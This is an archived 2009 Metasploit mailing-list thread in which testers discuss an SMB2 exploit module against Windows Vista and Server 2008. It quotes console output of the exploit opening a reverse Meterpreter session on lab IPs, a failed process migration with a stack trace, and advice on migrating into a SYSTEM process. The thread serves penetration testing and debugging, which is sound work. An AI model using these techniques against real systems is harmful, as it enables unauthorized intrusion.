Metasploit mailing list archives
Metasploit 3.3 Development Updates
From: carlos_perez at darkoperator.com (Carlos Perez)
Date: Tue, 29 Sep 2009 12:26:05 -0400
Have you tried to migrate to another service running as SYSTEM, instead of downgrading your permissions by migrating to explorer or moving to another process with a different set of credentials?

On Tue, Sep 29, 2009 at 12:16 PM, Matt Gardenghi <mtgarden at gmail.com> wrote:

> Is this caused by DEP? That might explain the successful exploit but failure to migrate....
>
> On Tue, Sep 29, 2009 at 12:08 PM, David Gomes <skysbsb at gmail.com> wrote:
>
>> I have tried against Windows Vista and successfully exploited the vulnerability. However, I can't migrate to another process, and I can't exploit this same vulnerability twice.
>>
>> msf exploit(smb2_negotiate_func_index) > exploit
>> [*] Connecting to the target (10.10.0.38:445)...
>> [*] Started reverse handler
>> [*] Sending the exploit packet (854 bytes)...
>> [*] Waiting up to 180 seconds for exploit to trigger...
>> [*] Sending stage (719360 bytes)
>> [*] Meterpreter session 1 opened (10.10.0.55:4444 -> 10.10.0.38:64969)
>>
>> meterpreter > ps
>>
>> Process list
>> ============
>> 3952 Explorer.EXE C:\Windows\Explorer.EXE
>> ...
>>
>> meterpreter > migrate 3952
>> [*] Migrating to 3952...
>> ^C[-] Error while running command migrate:
>>
>> meterpreter > ps
>> [-] Error running command ps: undefined method `write' for nil:NilClass
>> /pentest/exploits/framework3/lib/rex/socket/ssl_tcp.rb:97:in `write'
>> /pentest/exploits/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:59:in `send_packet'
>> /pentest/exploits/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:92:in `send_packet_wait_response'
>> /pentest/exploits/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:69:in `send_request'
>> /pentest/exploits/framework3/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:216:in `get_processes'
>> /pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:190:in `cmd_ps'
>> /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
>> /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
>> /pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'
>> /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
>> /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
>> /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
>> /pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'
>> /pentest/exploits/framework3/lib/rex/ui/text/shell.rb:123:in `call'
>> /pentest/exploits/framework3/lib/rex/ui/text/shell.rb:123:in `run'
>> /pentest/exploits/framework3/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'
>> /pentest/exploits/framework3/lib/msf/base/sessions/meterpreter.rb:203:in `_interact'
>> /pentest/exploits/framework3/lib/rex/ui/interactive.rb:48:in `interact'
>> /pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/core.rb:1007:in `cmd_sessions'
>> /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
>> /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
>> /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
>> /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
>> /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
>> /pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in `cmd_exploit'
>> /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
>> /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
>> /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
>> /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
>> /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
>> /pentest/exploits/framework3/lib/rex/ui/text/shell.rb:127:in `run'
>> ./msfconsole:82
>>
>> meterpreter > exit
>>
>> msf exploit(smb2_negotiate_func_index) > exploit
>> [*] Connecting to the target (10.10.0.38:445)...
>> [*] Started reverse handler
>> [*] Sending the exploit packet (854 bytes)...
>> [*] Waiting up to 180 seconds for exploit to trigger...
>> [*] Exploit completed, but no session was created.
>>
>> On Tue, Sep 29, 2009 at 11:02 AM, Danilo Nascimento <danilo.nascimento.c at gmail.com> wrote:
>>
>>> I can't exploit VMs in VirtualBox against Windows Server 2008 Enterprise/Standard (no updates) and Windows Vista Business EN SP1 on an x86 host and guest OS. I've tried enabling/disabling the PAE/NX option, but a BSOD occurred when I ran the exploit. Which VM application are you using? When I have some free time I'll test on VMware ESXi and Xen.
>>>
>>> This exploit works fine against physical machines (Vista SP1 and Windows Server 2008) for me; the problem is that I can't migrate to another process (Explorer.exe) and I can exploit only once.
>>>
>>> Danilo Nascimento
>>>
>>> On Tue, Sep 29, 2009 at 9:01 AM, HD Moore <hdm at metasploit.com> wrote:
>>>
>>>> On Tue, 2009-09-29 at 12:42 +0200, Giorgio Casali wrote:
>>>>
>>>>> Unfortunately I tried it against a Vista SP2 Enterprise and the exploit failed, while on a Vista SP2 Ultimate I ended up with a BSOD. Any idea where I should look?
>>>>
>>>> We're seeing reports of it failing about 50/50 with physical machines and working almost always with VMs - either way we need to dig into it and do a little more work. Thanks for the feedback!
>>>>
>>>> -HD
>>
>> --
>> David Gomes Guimarães, Computer Science undergraduate - UFG, networking intern - CERCOMP/UFG.
>
> --
> Matt Gardenghi

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework